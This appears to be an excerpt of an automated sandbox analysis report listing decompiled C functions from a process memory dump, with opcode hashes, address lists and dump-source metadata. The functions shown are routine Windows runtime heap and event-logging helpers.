                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                        • Instruction ID: a931134cf742bf2fa8d24834c7f3a99d0ff9517e36051a847460c5cc409e547c
                                                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                        • Instruction Fuzzy Hash: 2801A232200A849BD726969DDC04F5A7BD9EF91758F0C09A2EA15CB6B1E678F840C215
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0492FE87, Relevance: .0, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 46%
                                                        			E0492FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x498d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E048B7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E048DB640(E048D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                        0x0492fe96
                                                        0x0492fe9e
                                                        0x0492fea1
                                                        0x0492fead
                                                        0x0492feb3
                                                        0x0492feb9
                                                        0x0492fec3
                                                        0x0492fed5
                                                        0x0492fec5
                                                        0x0492fece
                                                        0x0492fece
                                                        0x0492fee0
                                                        0x0492fee1
                                                        0x0492fee3
                                                        0x0492fee8
                                                        0x0492fefb

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2bbd11870498732d90ba3c6ef2a1968b77b6dbea8fdec33ddf8b98c293056521
                                                        • Instruction ID: 76bc7b8bc9bef403228e2ba75a2ec60c3770c60f497cc544a523f6bb8175c672
                                                        • Opcode Fuzzy Hash: 2bbd11870498732d90ba3c6ef2a1968b77b6dbea8fdec33ddf8b98c293056521
                                                        • Instruction Fuzzy Hash: EC016270A05218AFCB14DFACD545A6EB7F4EF04304F144569E504DB382D675E901DB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04968F6A, Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 48%
                                                        			E04968F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x498d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E048B7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E048DB640(E048D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                        0x04968f6a
                                                        0x04968f79
                                                        0x04968f81
                                                        0x04968f84
                                                        0x04968f8b
                                                        0x04968f91
                                                        0x04968f94
                                                        0x04968f9e
                                                        0x04968fb0
                                                        0x04968fa0
                                                        0x04968fa9
                                                        0x04968fa9
                                                        0x04968fbb
                                                        0x04968fbc
                                                        0x04968fbe
                                                        0x04968fc3
                                                        0x04968fd6

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be04232173116cc0a35cb2b8f2423941b6f64f80e8243d7223f6ccb39936fa10
                                                        • Instruction ID: 612a1e29065fe6dff0e0abc402e2147aa9c5923297a488baf69a44e37cdd715e
                                                        • Opcode Fuzzy Hash: be04232173116cc0a35cb2b8f2423941b6f64f80e8243d7223f6ccb39936fa10
                                                        • Instruction Fuzzy Hash: 4D014974A0520C9FD704EF6CD545A9EB7F4EF48304F104569F905EB380D674EA00DB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0495131B, Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 48%
                                                        			E0495131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x498d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E048B7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E048DB640(E048D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                        0x0495131b
                                                        0x0495132a
                                                        0x04951330
                                                        0x04951336
                                                        0x0495133e
                                                        0x04951341
                                                        0x04951344
                                                        0x0495134f
                                                        0x04951361
                                                        0x04951351
                                                        0x0495135a
                                                        0x0495135a
                                                        0x0495136c
                                                        0x0495136d
                                                        0x0495136f
                                                        0x04951374
                                                        0x04951387

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 28d8c8936de6627d347a9438a6fce4813fd18fb2e16d6811af6e64b493410105
                                                        • Instruction ID: f7b0588ffae4c5da768d20d800dd857f858dad2f26bda4827c27ef2e6827d9bb
                                                        • Opcode Fuzzy Hash: 28d8c8936de6627d347a9438a6fce4813fd18fb2e16d6811af6e64b493410105
                                                        • Instruction Fuzzy Hash: D1016971E01208AFCB04EFA8E505AAEB7F4EF08300F10456AF845EB391E674AA00CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04951608, Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 46%
                                                        			E04951608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x498d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E048B7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E048DB640(E048D9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                        0x04951608
                                                        0x04951617
                                                        0x0495161d
                                                        0x04951625
                                                        0x04951628
                                                        0x0495162b
                                                        0x04951636
                                                        0x04951648
                                                        0x04951638
                                                        0x04951641
                                                        0x04951641
                                                        0x04951653
                                                        0x04951654
                                                        0x04951656
                                                        0x0495165b
                                                        0x0495166e

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6f4c51c28809cf2d81ecbc5e1967dc3c81c2d89784e1376323528c21842095e7
                                                        • Instruction ID: 1e87e5e53f9a215515f0f43159b9f20d5e20108dcab42428766ce8359630102d
                                                        • Opcode Fuzzy Hash: 6f4c51c28809cf2d81ecbc5e1967dc3c81c2d89784e1376323528c21842095e7
                                                        • Instruction Fuzzy Hash: F0F06271E05258EFDB04DFACD445EAEB7F4EF04300F044569E905EB391E674A900CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048BC577, Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048BC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E048BC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x48711cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E049688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                        0x048bc577
                                                        0x048bc57d
                                                        0x048bc581
                                                        0x048bc5b5
                                                        0x048bc5b9
                                                        0x048bc5ce
                                                        0x048bc5ce
                                                        0x048bc5ca
                                                        0x00000000
                                                        0x048bc5ca
                                                        0x048bc5c4
                                                        0x048bc5c8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048bc5ad
                                                        0x00000000
                                                        0x048bc5af

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a2a4e979534a11b0d474553f31ab5aea3977af98a31c1a1c4df5ef2301bfc9ef
                                                        • Instruction ID: c725bde0d26b138f106f5e5335260029e0a8505d0e654e8af2f3c9eb0248eb12
                                                        • Opcode Fuzzy Hash: a2a4e979534a11b0d474553f31ab5aea3977af98a31c1a1c4df5ef2301bfc9ef
                                                        • Instruction Fuzzy Hash: 52F090B2915A949EE731DF188044BA27FD4BB05774F44CE6ED596C7701C6A4F884C2D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04968D34, Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 43%
                                                        			E04968D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x498d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E048B7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E048DB640(E048D9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                        0x04968d34
                                                        0x04968d43
                                                        0x04968d4b
                                                        0x04968d4e
                                                        0x04968d52
                                                        0x04968d5c
                                                        0x04968d6e
                                                        0x04968d5e
                                                        0x04968d67
                                                        0x04968d67
                                                        0x04968d79
                                                        0x04968d7a
                                                        0x04968d7c
                                                        0x04968d81
                                                        0x04968d94

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a124988aef56a718c7475917de9a2947548842143664acf145afd49b789f6c2
                                                        • Instruction ID: cde6e5e88099e41eb7a7088104e81cdd65a192fad1cb26bd49f7224c2645a01c
                                                        • Opcode Fuzzy Hash: 5a124988aef56a718c7475917de9a2947548842143664acf145afd49b789f6c2
                                                        • Instruction Fuzzy Hash: A9F0B470E056089FD704EFBCD541A6E77B4EF04304F1085A9E906EB380EA74F900C755
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04952073, Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 94%
                                                        			E04952073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0494FD22(__ecx);
				_t19 =  *0x498849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4988748; // 0x0
					if(__eflags <= 0) {
						E04951C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4988724 & 0x00000004;
							if(( *0x4988724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4988724; // 0x0
					return E04948DF1(__ebx, 0xc0000374, 0x4985890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                        0x04952076
                                                        0x04952078
                                                        0x0495207d
                                                        0x04952083
                                                        0x049520a4
                                                        0x049520aa
                                                        0x049520ac
                                                        0x049520b7
                                                        0x049520ba
                                                        0x049520bc
                                                        0x049520c9
                                                        0x049520c9
                                                        0x049520d0
                                                        0x049520d2
                                                        0x00000000
                                                        0x049520d2
                                                        0x049520be
                                                        0x049520c3
                                                        0x049520c5
                                                        0x049520c7
                                                        0x00000000
                                                        0x00000000
                                                        0x049520c7
                                                        0x049520bc
                                                        0x049520d4
                                                        0x04952085
                                                        0x04952085
                                                        0x049520a3
                                                        0x049520a3

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d8188a4d10e73432b920283c0f2b28828392d34ece0dd54035c4013fc0fcf539
                                                        • Instruction ID: 73da115d9a21dec331ff28bc2182f13ea50e8c6a57dcaca3a4efb50fcb4924a3
                                                        • Opcode Fuzzy Hash: d8188a4d10e73432b920283c0f2b28828392d34ece0dd54035c4013fc0fcf539
                                                        • Instruction Fuzzy Hash: 51F0A72A41B2844AEF36FF39A5017E57FA8D7C5114F6A04F9DD5017214C639AC83CF20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D927A, Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 54%
                                                        			E048D927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L048B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E048DFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E048D92C6(_t11, _t14);
				}
				return _t11;
			}





                                                        0x048d9295
                                                        0x048d9299
                                                        0x048d929f
                                                        0x048d92aa
                                                        0x048d92ad
                                                        0x048d92ae
                                                        0x048d92af
                                                        0x048d92b0
                                                        0x048d92b4
                                                        0x048d92bb
                                                        0x048d92bb
                                                        0x048d92c5

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                        • Instruction ID: 6c3d5232d9f9c09639cdbc79d013c985573da6f2a8dc6dc87e7a3b607d6b444f
                                                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                        • Instruction Fuzzy Hash: 3EE02B723415002BF711AE09CC80F47376DDF82724F044578F5009F242C6E5EC0887A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04968CD6, Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 36%
                                                        			E04968CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x498d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E048B7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E048DB640(E048D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                        0x04968ce5
                                                        0x04968ced
                                                        0x04968cf0
                                                        0x04968cfb
                                                        0x04968d0d
                                                        0x04968cfd
                                                        0x04968d06
                                                        0x04968d06
                                                        0x04968d18
                                                        0x04968d19
                                                        0x04968d1b
                                                        0x04968d20
                                                        0x04968d33

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 60c65b14922bbdff7531452ccaf1333180693b279dbabb637fc6b66efb26f021
                                                        • Instruction ID: 3368a05f6a5e2b586b0dfde6c40fcbddbf5925807af166be3d08388e3bc4ffcc
                                                        • Opcode Fuzzy Hash: 60c65b14922bbdff7531452ccaf1333180693b279dbabb637fc6b66efb26f021
                                                        • Instruction Fuzzy Hash: 2EF08970A052489FDB04EBACE955D6E77B4EF49304F140669E516EB3C0EA74F900C755
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048B746D, Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 88%
                                                        			E048B746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E048AEB70(__ecx, 0x49879a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E048D95D0();
							L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                        0x048b746d
                                                        0x048b746d
                                                        0x048b746d
                                                        0x048b7471
                                                        0x048b7488
                                                        0x048ff92d
                                                        0x048b748e
                                                        0x048b7491
                                                        0x048b7495
                                                        0x048ff937
                                                        0x048ff93a
                                                        0x048ff94e
                                                        0x048ff953
                                                        0x048ff956
                                                        0x048ff956
                                                        0x048b7495
                                                        0x00000000
                                                        0x048b7488
                                                        0x048b7473
                                                        0x048b7478
                                                        0x048b747d
                                                        0x048b7481
                                                        0x00000000
                                                        0x048b7481
                                                        0x048b747d
                                                        0x048b747a
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ddddca4f33a1237660156c39b1ea17c3bcb86921cc6ee3874618d6cd8e7da91c
                                                        • Instruction ID: cfa39f4ec5a4bf9f80488aeb4e9908de959f40da3ecc9c75d9a2b6284c2b5ef9
                                                        • Opcode Fuzzy Hash: ddddca4f33a1237660156c39b1ea17c3bcb86921cc6ee3874618d6cd8e7da91c
                                                        • Instruction Fuzzy Hash: 7CF09034705348AEDB019A6CC840BB9BF71AF84219F040F55D9D1EB250E7A5B80186C6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04894F2E, Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E04894F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E049688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E048BC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4871030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                        0x04894f2e
                                                        0x04894f34
                                                        0x04894f38
                                                        0x048f0b85
                                                        0x048f0b85
                                                        0x048f0b89
                                                        0x048f0b9a
                                                        0x048f0b9a
                                                        0x048f0b9f
                                                        0x00000000
                                                        0x048f0b9f
                                                        0x048f0b94
                                                        0x048f0b98
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048f0b98
                                                        0x04894f3e
                                                        0x04894f48
                                                        0x00000000
                                                        0x04894f6e
                                                        0x00000000
                                                        0x04894f70

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0b766e88fa4714bf33eadf44e8bffdbe85235f31da3a83a210404740f12aab69
                                                        • Instruction ID: fbb835dc4af020c3551f4deaa1822274348e9a4b785dd7725258a9ded614bdb4
                                                        • Opcode Fuzzy Hash: 0b766e88fa4714bf33eadf44e8bffdbe85235f31da3a83a210404740f12aab69
                                                        • Instruction Fuzzy Hash: DFF0E23253A6948FEB71DB58C944B22B7D4AB027B8F244E74D505C7A22C724FC45C680
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04968B58, Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 36%
                                                        			E04968B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x498d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E048B7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E048DB640(E048D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                        0x04968b67
                                                        0x04968b6f
                                                        0x04968b72
                                                        0x04968b7d
                                                        0x04968b8f
                                                        0x04968b7f
                                                        0x04968b88
                                                        0x04968b88
                                                        0x04968b9a
                                                        0x04968b9b
                                                        0x04968b9d
                                                        0x04968ba2
                                                        0x04968bb5

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 28e57eb6ceb5bf9ea3686ac4906e54391c3d57a2193b6c061db97d73016ce4b7
                                                        • Instruction ID: ebf9f259bfaa41be32873afc2813b6b775df583a73213d08fd1f8adf3b527366
                                                        • Opcode Fuzzy Hash: 28e57eb6ceb5bf9ea3686ac4906e54391c3d57a2193b6c061db97d73016ce4b7
                                                        • Instruction Fuzzy Hash: 26F05EB0A05258AFEB14EBB8E906E6E77A8EB04304F040969A905DB380EA74E900C795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048CA44B, Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048CA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x4987b9c; // 0x0
				_t15 = __ecx;
				_t16 = L048B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E048DFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                        0x048ca44b
                                                        0x048ca453
                                                        0x048ca472
                                                        0x048ca476
                                                        0x00000000
                                                        0x048ca493
                                                        0x048ca47a
                                                        0x048ca47f
                                                        0x048ca486
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0ee89cf82d98a1c9ce8b624a89f88c4c49dfa281aa7e84005873e17a318dcceb
                                                        • Instruction ID: 94768d7abfb5519604bd974322334b1e9f65dfc7218deb6599f6bbd50a1b8d6a
                                                        • Opcode Fuzzy Hash: 0ee89cf82d98a1c9ce8b624a89f88c4c49dfa281aa7e84005873e17a318dcceb
                                                        • Instruction Fuzzy Hash: B4E02272A01420ABE2114F18EC00F66739EDBD1A05F090938E604E7210D668ED01C7E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

